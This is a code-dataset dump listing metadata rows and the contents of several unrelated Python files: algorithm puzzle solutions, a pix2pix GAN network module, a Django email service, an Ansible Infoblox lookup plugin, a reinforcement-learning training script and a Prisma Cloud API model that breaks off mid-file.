blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b332387214949ab45f1771f0aae9a5028021c655 | a81d21f98dd558416f8731f001cb8151d8309f4f | /interviewbit/interviewbit/pointers/three_sum_zero.py | cea0a17f6a40485087dbf69d9c3abc66aac3694b | [] | no_license | marquesarthur/programming_problems | 1128c38e65aade27e2435f7987d7ee2b328fda51 | 2f7df25d0d735f726b7012e4aa2417dee50526d9 | refs/heads/master | 2022-01-25T18:19:02.575634 | 2022-01-18T02:07:06 | 2022-01-18T02:07:06 | 32,213,919 | 2 | 0 | null | 2020-10-13T01:29:08 | 2015-03-14T13:44:06 | Python | UTF-8 | Python | false | false | 2,088 | py | class Solution:
def threeSum(self, A):
A = sorted(A)
n = len(A)
result = set()
for i in range(n):
j = i + 1
k = n - 1
target = A[i]
while j < k:
if target + A[j] + A[k] < 0:
j += 1
elif target + A[j] + A[k] > 0:
k -= 1
else:
result.add((A[i], A[j], A[k]))
j += 1
return sorted(list(result))
# Exceeds time limit but does the job
class MatrixSolution:
def binarySearch(self, A, x):
begin = 0
end = len(A) - 1
while begin <= end:
mid = int(begin + (end - begin) / 2)
if A[mid] == x:
return mid
elif A[mid] > x:
end = mid - 1
else:
begin = mid + 1
return -1
# @param A : list of integers
# @return a list of list of integers
def threeSum(self, A):
A = sorted(A)
S = list(A)
n = len(A)
B = [None] * len(A)
for i in range(len(A)):
B[i] = [None] * n
for j in range(i + 1, len(A)):
k = A[i] + A[j]
B[i][j] = -k
result = []
for i in range(n):
for j in range(i + 1, n):
x = B[i][j]
s_aux = [x for a, x in enumerate(A) if a != i and a != j and A[a] is not None]
k = self.binarySearch(s_aux, x)
if k != -1 and A[i] is not None and A[j] is not None:
k = self.binarySearch(S, x)
aux = sorted([A[i], A[j], S[k]])
exists = False
for r in result:
if r[0] == aux[0] and r[1] == aux[1] and r[2] == aux[2]:
exists = True
break
if not exists:
result.append(aux)
ret = [(r[0], r[1], r[2]) for r in result]
return ret
| [
"marques.art@gmail.com"
] | marques.art@gmail.com |
6358884396388c3ab81261921c2983e5f5ede5ab | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /jSjjhzRg5MvTRPabx_10.py | 329a38580f7189f6c5c3fc07a47ac0fbdc5fc1a3 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,966 | py |
def sentence(words):
result = []
if len(words) == 1:
if words[0][0].lower() in "aeiou":
result.append("An " + words[0].lower() + '.')
else:
result.append("A " + words[0].lower() + ".")
elif len(words) == 2:
if words[0][0].lower() in "aeiou" and words[1][0].lower() in "aeiou":
result.append("An " + words[0].lower() + " and an " + words[1].lower() + '.')
elif words[0][0].lower() in "aeiou" and words[1][0].lower() not in "aeiou":
result.append("An " + words[0].lower() + " and a " + words[1].lower() + '.')
elif words[0][0].lower() not in "aeiou" and words[1][0].lower() in "aeiou":
result.append("A " + words[0].lower() + " and an " + words[1].lower() + '.')
else:
result.append("A " + words[0].lower() + " and a " + words[1].lower() + '.')
else:
for i in range(0, len(words) - 2):
if i == 0:
if words[i][0].lower() in "aeiou":
result.append("An " + words[i].lower())
else:
result.append("A " + words[i].lower())
else:
if words[i][0].lower() in "aeiou":
result.append("an " + words[i].lower())
else:
result.append("a " + words[i].lower())
if words[-2][0].lower() in "aeiou" and words[-1][0].lower() in "aeiou":
result.append("an " + words[-2].lower() + " and an " + words[-1] + ".")
elif words[-2][0].lower() in "aeiou" and words[-1][0].lower() not in "aeiou":
result.append("an " + words[-2].lower() + " and a " + words[-1] + ".")
elif words[-2][0].lower() not in "aeiou" and words[-1][0].lower() in "aeiou":
result.append("a " + words[-2].lower() + " and an " + words[-1] + ".")
else:
result.append("a " + words[-2].lower() + " and a " + words[-1] + ".")
return ", ".join(result)
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
ea68d77f4f32d08fb814a0049b8bd29dfa307ca4 | 41a0220bf117124bf281a50396582c0df1e0675f | /Pyrado/scripts/evaluation/trn_argmax_policy_bayrn.py | da89629bf80d4d2cf83de3f2f6b06d59b967a485 | [
"BSD-3-Clause"
] | permissive | jacarvalho/SimuRLacra | c071dfc22d4f2c54a198405e8974d03333c9961d | a6c982862e2ab39a9f65d1c09aa59d9a8b7ac6c5 | refs/heads/master | 2022-11-24T20:08:52.376545 | 2020-08-03T09:01:35 | 2020-08-03T09:01:35 | 276,885,755 | 0 | 0 | BSD-3-Clause | 2020-07-03T11:39:21 | 2020-07-03T11:39:21 | null | UTF-8 | Python | false | false | 2,508 | py | """
Script to get the maximizer of a GP's posterior given saved data from a BayRn experiment
"""
import os.path as osp
import torch as to
from pyrado.algorithms.advantage import GAE
from pyrado.algorithms.bayrn import BayRn
from pyrado.algorithms.cem import CEM
from pyrado.algorithms.nes import NES
from pyrado.algorithms.power import PoWER
from pyrado.algorithms.ppo import PPO, PPO2
from pyrado.logger.experiment import ask_for_experiment
from pyrado.utils.argparser import get_argparser
from pyrado.utils.experiments import load_experiment
from pyrado.utils.math import UnitCubeProjector
if __name__ == '__main__':
# Parse command line arguments
args = get_argparser().parse_args()
# Get the experiment's directory to load from
ex_dir = ask_for_experiment() if args.ex_dir is None else args.ex_dir
# Load the environment and the policy
env_sim, policy, kwout = load_experiment(ex_dir, args)
# Load the required data
cands = to.load(osp.join(ex_dir, 'candidates.pt'))
cands_values = to.load(osp.join(ex_dir, 'candidates_values.pt')).unsqueeze(1)
bounds = to.load(osp.join(ex_dir, 'bounds.pt'))
uc_normalizer = UnitCubeProjector(bounds[0, :], bounds[1, :])
# Decide on which algorithm to use via the mode argument
if args.mode == PPO.name:
critic = GAE(kwout['value_fcn'], **kwout['hparams']['critic'])
subroutine = PPO(ex_dir, env_sim, policy, critic, **kwout['hparams']['subroutine'])
elif args.mode == PPO2.name:
critic = GAE(kwout['value_fcn'], **kwout['hparams']['critic'])
subroutine = PPO2(ex_dir, env_sim, policy, critic, **kwout['hparams']['subroutine'])
elif args.mode == CEM.name:
subroutine = CEM(ex_dir, env_sim, policy, **kwout['hparams']['subroutine'])
elif args.mode == NES.name:
subroutine = NES(ex_dir, env_sim, policy, **kwout['hparams']['subroutine'])
elif args.mode == PoWER.name:
subroutine = PoWER(ex_dir, env_sim, policy, **kwout['hparams']['subroutine'])
else:
raise NotImplementedError('Only PPO, PPO2, CEM, NES, and PoWER are implemented so far.')
if args.warmstart:
ppi = policy.param_values.data
vpi = kwout['value_fcn'].param_values.data
else:
ppi = None
vpi = None
# Train the policy on the most lucrative domain
BayRn.train_argmax_policy(ex_dir, env_sim, subroutine, num_restarts=500, num_samples=1000,
policy_param_init=ppi, valuefcn_param_init=vpi)
| [
"fabio.muratore@famura.net"
] | fabio.muratore@famura.net |
b967bedddcf45fcc7236e63a57d263e03a35babc | a2c0c8f20584a5d92551f18e7f6e73cfc20ab9a6 | /27.py | d7162bd765c2eecbb712bf831cd9d3b7ebc2922d | [] | no_license | subayadhav/wed05061 | 8acbd1491cd4d5d7f0eb98c62ade8879b5a8739a | 45cdb0bbe11624967178c356b31c90abf99eb412 | refs/heads/master | 2020-05-31T16:57:36.956998 | 2019-06-05T17:39:37 | 2019-06-05T17:39:37 | 190,394,471 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 69 | py | n1=input()
if n1.isnumeric()==True:
print("Yes")
else:
print("No")
| [
"noreply@github.com"
] | subayadhav.noreply@github.com |
2cb62cc18d2371aebccf0e88ffa1ecd3594ee3e2 | 6c61ad8562dd72888d1544d6176fee5eb73d1e15 | /pix2pix/networks.py | 8ea028ed60acb2374b59227449788659ab54c3ee | [
"MIT"
] | permissive | kendricktan/rarepepes | 7b744ff483d00163ace541577da51b30eb1191dc | c6e7525cba4c3e3ff9f7de8e97a02b3f3450b898 | refs/heads/master | 2021-06-06T11:24:10.206399 | 2017-05-26T02:09:18 | 2017-05-26T02:09:18 | 90,793,293 | 24 | 4 | MIT | 2021-04-02T15:51:43 | 2017-05-09T21:25:10 | Python | UTF-8 | Python | false | false | 9,328 | py | import torch
import torch.nn as nn
from torch.autograd import Variable
import numpy as np
###############################################################################
# Functions
###############################################################################
def weights_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
m.weight.data.normal_(0.0, 0.02)
elif classname.find('BatchNorm2d') != -1 or classname.find('InstanceNorm2d') != -1:
m.weight.data.normal_(1.0, 0.02)
m.bias.data.fill_(0)
def get_norm_layer(norm_type):
if norm_type == 'batch':
norm_layer = nn.BatchNorm2d
elif norm_type == 'instance':
norm_layer = nn.InstanceNorm2d
else:
print('normalization layer [%s] is not found' % norm_layer)
return norm_layer
def define_G(input_nc, output_nc, ngf, norm='batch', use_dropout=False, gpu_ids=[]):
netG = None
use_gpu = len(gpu_ids) > 0
norm_layer = get_norm_layer(norm_type=norm)
if use_gpu:
assert(torch.cuda.is_available())
netG = UnetGenerator(input_nc, output_nc, 8, ngf,
norm_layer=norm_layer, use_dropout=use_dropout, gpu_ids=gpu_ids)
if len(gpu_ids) > 0:
netG.cuda(device_id=gpu_ids[0])
netG.apply(weights_init)
return netG
def define_D(input_nc, ndf, n_layers_D=3, norm='batch', use_sigmoid=False, gpu_ids=[]):
netD = None
use_gpu = len(gpu_ids) > 0
norm_layer = get_norm_layer(norm_type=norm)
if use_gpu:
assert(torch.cuda.is_available())
netD = NLayerDiscriminator(
input_nc, ndf, n_layers=3, norm_layer=norm_layer, use_sigmoid=use_sigmoid, gpu_ids=gpu_ids)
if use_gpu:
netD.cuda(device_id=gpu_ids[0])
netD.apply(weights_init)
return netD
def print_network(net):
num_params = 0
for param in net.parameters():
num_params += param.numel()
print(net)
print('Total number of parameters: %d' % num_params)
##############################################################################
# Classes
##############################################################################
# Defines the GAN loss which uses either LSGAN or the regular GAN.
# When LSGAN is used, it is basically same as MSELoss,
# but it abstracts away the need to create the target label tensor
# that has the same size as the input
class GANLoss(nn.Module):
def __init__(self, use_lsgan=True, target_real_label=1.0, target_fake_label=0.0,
tensor=torch.FloatTensor):
super(GANLoss, self).__init__()
self.real_label = target_real_label
self.fake_label = target_fake_label
self.real_label_var = None
self.fake_label_var = None
self.Tensor = tensor
if use_lsgan:
self.loss = nn.MSELoss()
else:
self.loss = nn.BCELoss()
def get_target_tensor(self, input, target_is_real):
target_tensor = None
if target_is_real:
create_label = ((self.real_label_var is None) or
(self.real_label_var.numel() != input.numel()))
if create_label:
real_tensor = self.Tensor(input.size()).fill_(self.real_label)
self.real_label_var = Variable(
real_tensor, requires_grad=False)
target_tensor = self.real_label_var
else:
create_label = ((self.fake_label_var is None) or
(self.fake_label_var.numel() != input.numel()))
if create_label:
fake_tensor = self.Tensor(input.size()).fill_(self.fake_label)
self.fake_label_var = Variable(
fake_tensor, requires_grad=False)
target_tensor = self.fake_label_var
return target_tensor
def __call__(self, input, target_is_real):
target_tensor = self.get_target_tensor(input, target_is_real)
return self.loss(input, target_tensor)
# Defines the Unet generator.
# |num_downs|: number of downsamplings in UNet. For example,
# if |num_downs| == 7, image of size 128x128 will become of size 1x1
# at the bottleneck
class UnetGenerator(nn.Module):
def __init__(self, input_nc, output_nc, num_downs, ngf=64,
norm_layer=nn.BatchNorm2d, use_dropout=False, gpu_ids=[]):
super(UnetGenerator, self).__init__()
self.gpu_ids = gpu_ids
# currently support only input_nc == output_nc
assert(input_nc == output_nc)
# construct unet structure
unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, innermost=True)
for i in range(num_downs - 5):
unet_block = UnetSkipConnectionBlock(
ngf * 8, ngf * 8, unet_block, norm_layer=norm_layer, use_dropout=use_dropout)
unet_block = UnetSkipConnectionBlock(
ngf * 4, ngf * 8, unet_block, norm_layer=norm_layer)
unet_block = UnetSkipConnectionBlock(
ngf * 2, ngf * 4, unet_block, norm_layer=norm_layer)
unet_block = UnetSkipConnectionBlock(
ngf, ngf * 2, unet_block, norm_layer=norm_layer)
unet_block = UnetSkipConnectionBlock(
output_nc, ngf, unet_block, outermost=True, norm_layer=norm_layer)
self.model = unet_block
def forward(self, input):
if self.gpu_ids and isinstance(input.data, torch.cuda.FloatTensor):
return nn.parallel.data_parallel(self.model, input, self.gpu_ids)
else:
return self.model(input)
# Defines the submodule with skip connection.
# X -------------------identity---------------------- X
# |-- downsampling -- |submodule| -- upsampling --|
class UnetSkipConnectionBlock(nn.Module):
def __init__(self, outer_nc, inner_nc,
submodule=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d, use_dropout=False):
super(UnetSkipConnectionBlock, self).__init__()
self.outermost = outermost
downconv = nn.Conv2d(outer_nc, inner_nc, kernel_size=4,
stride=2, padding=1)
downrelu = nn.LeakyReLU(0.2, True)
downnorm = norm_layer(inner_nc, affine=True)
uprelu = nn.ReLU(True)
upnorm = norm_layer(outer_nc, affine=True)
if outermost:
upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,
kernel_size=4, stride=2,
padding=1)
down = [downconv]
up = [uprelu, upconv, nn.Tanh()]
model = down + [submodule] + up
elif innermost:
upconv = nn.ConvTranspose2d(inner_nc, outer_nc,
kernel_size=4, stride=2,
padding=1)
down = [downrelu, downconv]
up = [uprelu, upconv, upnorm]
model = down + up
else:
upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,
kernel_size=4, stride=2,
padding=1)
down = [downrelu, downconv, downnorm]
up = [uprelu, upconv, upnorm]
if use_dropout:
model = down + [submodule] + up + [nn.Dropout(0.5)]
else:
model = down + [submodule] + up
self.model = nn.Sequential(*model)
def forward(self, x):
if self.outermost:
return self.model(x)
else:
return torch.cat([self.model(x), x], 1)
# Defines the PatchGAN discriminator with the specified arguments.
class NLayerDiscriminator(nn.Module):
def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d, use_sigmoid=False, gpu_ids=[]):
super(NLayerDiscriminator, self).__init__()
self.gpu_ids = gpu_ids
kw = 4
padw = int(np.ceil((kw - 1) / 2))
sequence = [
nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw),
nn.LeakyReLU(0.2, True)
]
nf_mult = 1
nf_mult_prev = 1
for n in range(1, n_layers):
nf_mult_prev = nf_mult
nf_mult = min(2**n, 8)
sequence += [
nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,
kernel_size=kw, stride=2, padding=padw),
# TODO: use InstanceNorm
norm_layer(ndf * nf_mult, affine=True),
nn.LeakyReLU(0.2, True)
]
nf_mult_prev = nf_mult
nf_mult = min(2**n_layers, 8)
sequence += [
nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,
kernel_size=kw, stride=1, padding=padw),
# TODO: useInstanceNorm
norm_layer(ndf * nf_mult, affine=True),
nn.LeakyReLU(0.2, True)
]
sequence += [nn.Conv2d(ndf * nf_mult, 1,
kernel_size=kw, stride=1, padding=padw)]
if use_sigmoid:
sequence += [nn.Sigmoid()]
self.model = nn.Sequential(*sequence)
def forward(self, x):
if len(self.gpu_ids) and isinstance(x.data, torch.cuda.FloatTensor):
return nn.parallel.data_parallel(self.model, x, self.gpu_ids)
else:
return self.model(x)
| [
"kendricktan0814@gmail.com"
] | kendricktan0814@gmail.com |
25c89576f82e9202346193c01764c1a192c9cbfd | 2825bf6479e08dfead428ff9f29f28d5c23d953e | /26_2/26_7.py | e9fd86e7707b27199667321125bfa3feba2697cc | [] | no_license | zedaster/ImaevIntensive | bc459187dace7946d8ad75a04e058748134aeac4 | b91760fa23f25ce2d19778781f35416c177ab881 | refs/heads/main | 2023-06-22T00:24:47.039208 | 2021-07-20T10:40:54 | 2021-07-20T10:40:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 248 | py | file = open('26-j2.txt')
values = sorted(map(int, file.readlines()[1:]))
medium = values[len(values)//2]
avg = sum(values)/len(values)
count = 0
for val in values:
if min(medium, avg) <= val <= max(medium, avg):
count += 1
print(count) | [
"serzh.kazantseff@gmail.com"
] | serzh.kazantseff@gmail.com |
fe0efe683946a1b5e9c30a52b867324f374e121c | eacff46eda2c6b509449979a16002b96d4645d8e | /Collections-a-installer/community-general-2.4.0/plugins/lookup/nios_next_ip.py | 5b979b8d075f498a8eacf83c572686b3d3b13f96 | [
"MIT",
"GPL-3.0-only",
"GPL-3.0-or-later"
] | permissive | d-amien-b/simple-getwordpress | 5e6d4d15d5f87124ab591e46b63fec552998fdc3 | da90d515a0aa837b633d50db4d91d22b031c04a2 | refs/heads/master | 2023-04-08T22:13:37.347545 | 2021-04-06T09:25:51 | 2021-04-06T09:25:51 | 351,698,069 | 0 | 0 | MIT | 2021-03-31T16:16:45 | 2021-03-26T07:30:00 | HTML | UTF-8 | Python | false | false | 3,580 | py | #
# Copyright 2018 Red Hat | Ansible
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
---
author: Unknown (!UNKNOWN)
name: nios_next_ip
short_description: Return the next available IP address for a network
description:
- Uses the Infoblox WAPI API to return the next available IP addresses
for a given network CIDR
requirements:
- infoblox-client
extends_documentation_fragment:
- community.general.nios
options:
_terms:
description: The CIDR network to retrieve the next addresses from
required: True
num:
description: The number of IP addresses to return
required: false
default: 1
exclude:
description: List of IP's that need to be excluded from returned IP addresses
required: false
'''
EXAMPLES = """
- name: return next available IP address for network 192.168.10.0/24
ansible.builtin.set_fact:
ipaddr: "{{ lookup('community.general.nios_next_ip', '192.168.10.0/24', provider={'host': 'nios01', 'username': 'admin', 'password': 'password'}) }}"
- name: return the next 3 available IP addresses for network 192.168.10.0/24
ansible.builtin.set_fact:
ipaddr: "{{ lookup('community.general.nios_next_ip', '192.168.10.0/24', num=3, provider={'host': 'nios01', 'username': 'admin', 'password': 'password'}) }}"
- name: return the next 3 available IP addresses for network 192.168.10.0/24 excluding ip addresses - ['192.168.10.1', '192.168.10.2']
ansible.builtin.set_fact:
ipaddr: "{{ lookup('community.general.nios_next_ip', '192.168.10.0/24', num=3, exclude=['192.168.10.1', '192.168.10.2'],
provider={'host': 'nios01', 'username': 'admin', 'password': 'password'}) }}"
"""
RETURN = """
_list:
description:
- The list of next IP addresses available
type: list
"""
from ansible.plugins.lookup import LookupBase
from ansible_collections.community.general.plugins.module_utils.net_tools.nios.api import WapiLookup
from ansible.module_utils._text import to_text
from ansible.errors import AnsibleError
class LookupModule(LookupBase):
def run(self, terms, variables=None, **kwargs):
try:
network = terms[0]
except IndexError:
raise AnsibleError('missing argument in the form of A.B.C.D/E')
provider = kwargs.pop('provider', {})
wapi = WapiLookup(provider)
network_obj = wapi.get_object('network', {'network': network})
if network_obj is None:
raise AnsibleError('unable to find network object %s' % network)
num = kwargs.get('num', 1)
exclude_ip = kwargs.get('exclude', [])
try:
ref = network_obj[0]['_ref']
avail_ips = wapi.call_func('next_available_ip', ref, {'num': num, 'exclude': exclude_ip})
return [avail_ips['ips']]
except Exception as exc:
raise AnsibleError(to_text(exc))
| [
"test@burdo.fr"
] | test@burdo.fr |
58178854f14d7de01b5a58abeb950b2d4c6fe2db | 6a61667e176b06ccdef07e84d79b382b2fb491bb | /common/services/email_service.py | 6b2cc57cdf6fc6d96376703f32b4245ec18d1103 | [] | no_license | vsokoltsov/Interview360Server | 333f08f13b33ef88928b3e4b844f60e72ebec809 | 252b0ebd77eefbcc945a0efc3068cc3421f46d5f | refs/heads/master | 2022-12-11T05:38:01.310133 | 2019-03-24T17:47:09 | 2019-03-24T17:47:09 | 95,320,167 | 2 | 3 | null | 2022-12-08T04:54:08 | 2017-06-24T20:09:08 | Python | UTF-8 | Python | false | false | 2,742 | py | from django.core.mail import send_mail
from django.template.loader import render_to_string
from django.core.mail import EmailMultiAlternatives
import os
import ipdb
class EmailService:
"""Service for email sending."""
SENDER = 'Anymail Sender <from@example.com>'
@classmethod
def send_interview_reminder(cls, user, vacancy, interview):
"""Send mail with remainding about upcoming interview."""
params = {
'vacancy': vacancy,
'interview': interview
}
msg = render_to_string('interview_reminder.html', params)
topic = 'Upcoming interview notification'
emails = [user]
cls._send_default_mail(topic, msg, emails)
@classmethod
def send_interview_invintation(cls, users, vacancy, interview):
"""Send email with interview invintation."""
params = {
'vacancy': vacancy,
'interview': interview
}
msg = render_to_string('interview_invitation.html', params)
topic = 'Interview invintation'
cls._send_default_mail(topic, msg, users)
@classmethod
def sent_personal_employee_invite(cls, user, token, company):
"""Send email notificaiton about invintation into the company."""
link_url = '{}/auth/invite'.format(
os.environ['DEFAULT_CLIENT_HOST']
)
msg = render_to_string('company_invite.html', {
'company': company,
'link_url': link_url,
'token': token}
)
topic = "Company invite mail"
cls._send_default_mail(topic, msg, [user])
@classmethod
def send_reset_password_mail(cls, user, token):
"""Send reset password email."""
reset_link = '{}/auth/reset-password'.format(
os.environ['DEFAULT_CLIENT_HOST'])
msg = render_to_string('reset_password.html', {
'reset_link_url': reset_link,
'token': token}
)
topic = 'Reset password'
cls._send_default_mail(topic, msg, [user])
@classmethod
def send_company_invite_confirmation(cls, user, company):
"""Send email with approvement of invite confirmation."""
company_link = '{}/companies/{}/'.format(
os.environ['DEFAULT_CLIENT_HOST'], company.id
)
msg = render_to_string('company_invite_final.html', {
'link_url': company_link,
'user': user,
'company': company
})
topic = 'Invite confirmation'
cls._send_default_mail(topic, msg, [user])
@classmethod
def _send_default_mail(cls, topic, message, mails):
"""Send mail with full attributes."""
send_mail(topic, message, cls.SENDER, mails)
| [
"vforvad@gmail.com"
] | vforvad@gmail.com |
a6c0a838c9d08cc5d940f86faa2809284d203636 | e3b9e8ec177e2b4c8bf24bbfefd7b2af4cd51e80 | /search/InitializationError.py | 339256d08a540446ba7de3e7f3b6b667392675c7 | [] | no_license | dmitriyVasilievich1986/radius-logs-parser | cae3ea7aade9ddcdd3b8739e8048a80ee8134d7c | f4d4256dee0c772b06d57acf49e72e742d56996e | refs/heads/main | 2023-06-02T23:26:09.001345 | 2021-06-25T13:00:05 | 2021-06-25T13:00:05 | 379,828,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py | from .Config import V3
class InitializationError(Exception):
def __init__(self, *args, **kwargs):
if V3:
super().__init__(*args, **kwargs)
else:
super(Exception, self).__init__(*args, **kwargs) | [
"dmitriyvasil@gmail.com"
] | dmitriyvasil@gmail.com |
046a2b58fd3c8b67a19b77e17be9792baf525356 | 112882b8d6c5071e7d2610c595bfca9210c79a0a | /tools/leetcode.189.Rotate Array/leetcode.189.Rotate Array.submission6.py | 927e2502fa4eb865d39c018a80d1e268d6be7b85 | [
"MIT"
] | permissive | tedye/leetcode | 193b1900d98e35d5c402013cbe3bc993d0235da2 | 975d7e3b8cb9b6be9e80e07febf4bcf6414acd46 | refs/heads/master | 2021-01-01T19:06:06.408135 | 2015-10-24T06:44:40 | 2015-10-24T06:44:40 | 41,804,923 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 336 | py | class Solution:
# @param nums, a list of integer
# @param k, num of steps
# @return nothing, please modify the nums list in-place.
def rotate(self, nums, k):
if not nums or k == 0:
return
k = len(nums) - k%len(nums)
for i in range(k):
nums.append(nums.pop(0))
| [
"tedye@bu.edu"
] | tedye@bu.edu |
c667278cf860aef9d54dc6dc40e0ec577a621cbe | 21e7753732296bfdfb6dd9a9b58c7c6b8d90a1e5 | /Hard/longestIncreasingSeq/longestIncreasingSeq_test.py | acf4794919c97abea3326458e44a4ef4dad62e8c | [] | no_license | rongfeng-china/python-algorithms-and-data-structures | eb8514b44d7ff97dd7c4deda2d8ea888a5aa8d04 | a69241bb7b684bc7d00acdd46c2fc214f7b61887 | refs/heads/master | 2020-03-13T09:08:13.375870 | 2015-12-11T07:37:30 | 2015-12-11T07:37:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 188 | py | from longestIncreasingSeq import longestIncreasingSeq
import pytest
def test_longestIncreasingSeq():
arr = [13,14,10,11,12]
res = longestIncreasingSeq(arr)
assert(res == [10,11,12])
| [
"prathamt@outlook.com"
] | prathamt@outlook.com |
b375d115741069c717a9c061d18b42d1de4fda00 | 70bee1e4e770398ae7ad9323bd9ea06f279e2796 | /openapi_client/models/waas_network_controls.py | 3099374b53195c2dcd56ab82bfaefc1258838d85 | [] | no_license | hi-artem/twistlock-py | c84b420b1e582b3c4cf3631eb72dac6d659d4746 | 9888e905f5b9d3cc00f9b84244588c0992f8e4f4 | refs/heads/main | 2023-07-18T07:57:57.705014 | 2021-08-22T04:36:33 | 2021-08-22T04:36:33 | 398,637,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,756 | py | # coding: utf-8
"""
Prisma Cloud Compute API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 21.04.439
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from openapi_client.configuration import Configuration
class WaasNetworkControls(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'advanced_protection_effect': 'WaasEffect',
'countries': 'WaasAccessControls',
'exception_subnets': 'list[str]',
'subnets': 'WaasAccessControls'
}
attribute_map = {
'advanced_protection_effect': 'advancedProtectionEffect',
'countries': 'countries',
'exception_subnets': 'exceptionSubnets',
'subnets': 'subnets'
}
def __init__(self, advanced_protection_effect=None, countries=None, exception_subnets=None, subnets=None, local_vars_configuration=None): # noqa: E501
"""WaasNetworkControls - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self._advanced_protection_effect = None
self._countries = None
self._exception_subnets = None
self._subnets = None
self.discriminator = None
if advanced_protection_effect is not None:
self.advanced_protection_effect = advanced_protection_effect
if countries is not None:
self.countries = countries
if exception_subnets is not None:
self.exception_subnets = exception_subnets
if subnets is not None:
self.subnets = subnets
@property
def advanced_protection_effect(self):
"""Gets the advanced_protection_effect of this WaasNetworkControls. # noqa: E501
:return: The advanced_protection_effect of this WaasNetworkControls. # noqa: E501
:rtype: WaasEffect
"""
return self._advanced_protection_effect
@advanced_protection_effect.setter
def advanced_protection_effect(self, advanced_protection_effect):
"""Sets the advanced_protection_effect of this WaasNetworkControls.
:param advanced_protection_effect: The advanced_protection_effect of this WaasNetworkControls. # noqa: E501
:type advanced_protection_effect: WaasEffect
"""
self._advanced_protection_effect = advanced_protection_effect
@property
def countries(self):
"""Gets the countries of this WaasNetworkControls. # noqa: E501
:return: The countries of this WaasNetworkControls. # noqa: E501
:rtype: WaasAccessControls
"""
return self._countries
@countries.setter
def countries(self, countries):
"""Sets the countries of this WaasNetworkControls.
:param countries: The countries of this WaasNetworkControls. # noqa: E501
:type countries: WaasAccessControls
"""
self._countries = countries
@property
def exception_subnets(self):
"""Gets the exception_subnets of this WaasNetworkControls. # noqa: E501
Network lists for which requests completely bypass WAAS checks and protections. # noqa: E501
:return: The exception_subnets of this WaasNetworkControls. # noqa: E501
:rtype: list[str]
"""
return self._exception_subnets
@exception_subnets.setter
def exception_subnets(self, exception_subnets):
"""Sets the exception_subnets of this WaasNetworkControls.
Network lists for which requests completely bypass WAAS checks and protections. # noqa: E501
:param exception_subnets: The exception_subnets of this WaasNetworkControls. # noqa: E501
:type exception_subnets: list[str]
"""
self._exception_subnets = exception_subnets
@property
def subnets(self):
"""Gets the subnets of this WaasNetworkControls. # noqa: E501
:return: The subnets of this WaasNetworkControls. # noqa: E501
:rtype: WaasAccessControls
"""
return self._subnets
@subnets.setter
def subnets(self, subnets):
"""Sets the subnets of this WaasNetworkControls.
:param subnets: The subnets of this WaasNetworkControls. # noqa: E501
:type subnets: WaasAccessControls
"""
self._subnets = subnets
def to_dict(self, serialize=False):
